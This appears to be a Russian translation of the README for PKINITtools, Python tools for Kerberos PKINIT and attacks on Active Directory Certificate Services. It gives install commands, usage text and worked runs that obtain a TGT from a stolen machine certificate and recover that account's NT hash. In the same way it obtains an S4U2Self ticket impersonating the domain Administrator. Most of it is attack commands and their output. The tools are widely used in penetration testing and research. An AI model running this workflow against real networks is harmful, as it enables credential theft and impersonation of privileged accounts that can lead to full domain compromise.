
Инструменты для Kerberos PKINIT и ретрансляции на AD CS
Этот репозиторий содержит несколько утилит для работы с PKINIT и сертификатами.
Инструменты построены на minikerberos и impacket. Сопровождающая статья с дополнительным контекстом: https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
Эти инструменты совместимы только с Python 3.5+. Клонируйте репозиторий с GitHub, установите зависимости и всё готово к работе:
git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos
Рекомендуется использовать virtualenv.
Запрос TGT с использованием PFX-файла (как файл или в виде base64-строки) или PEM-файлов для сертификата+ключа. Использует Kerberos PKINIT и выводит TGT в указанный ccache. Также выводит ключ шифрования AS-REP, который может понадобиться для getnthash.py. Пример использования:
(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py -h
usage: gettgtpkinit.py [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
domain/username ccache
Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key
positional arguments:
domain/username Domain and username in the cert
ccache ccache file to store the TGT in
optional arguments:
-h, --help show this help message and exit
-cert-pfx file PFX file
-pfx-pass password PFX file password
-pfx-base64 BASE64 PFX file as base64 string
-cert-pem file Certificate in PEM format
-key-pem file Private key file in PEM format
-dc-ip DC_IP DC IP or hostname to use as KDC
-v, --verbose
(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO Saved TGT to file
Использует Kerberos U2U для отправки запроса TGS для себя. Это включает PAC, который содержит NT-хэш, который можно расшифровать с помощью ключа AS-REP, использованного для вашего конкретного TGT. Это действительно магия. Этот инструмент требует, чтобы TGT, полученный от PKINIT, находился в переменной окружения KRB5CCNAME. Использование:
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
usage: getnthash.py [-h] -key KEY [-dc-ip ip address] [-debug] identity
positional arguments:
identity domain/username
optional arguments:
-h, --help show this help message and exit
-key KEY AS REP key from gettgtpkinit.py
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
-debug Turn DEBUG output ON
(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
fa6b130d73311d1be5495f589f9f4571
Использует Kerberos S4U2Self для запроса сервисного билета, действительного на хосте, для которого вы получили сертификат. Этот билет затем можно использовать для взаимодействия с исходным хостом. Требуется только TGT для учётной записи машины этого хоста. Этот TGT должен находиться в файле ccache, указанном в kerberos_connection_url. Единственный принимаемый kerberos_connection_url в этом примере — содержащий файл ccache, например kerberos+ccache://domain.local\\victimhostname\$:[email protected]. SPN должен быть именем службы на хосте, который вы выдаете себя за другого; это нельзя использовать для атак делегирования (поскольку не реализован S4U2Proxy, для этого есть много других инструментов). Использование:
(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py -h
usage: gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache
Gets an S4U2self ticket impersonating given user
positional arguments:
kerberos_connection_url
the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
spn the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a
TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
targetuser
ccache ccache file to store the TGT ticket in
optional arguments:
-h, --help show this help message and exit
-v, --verbose
(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO Success!
2021-07-28 10:09:13,696 minikerberos INFO Done!
MIT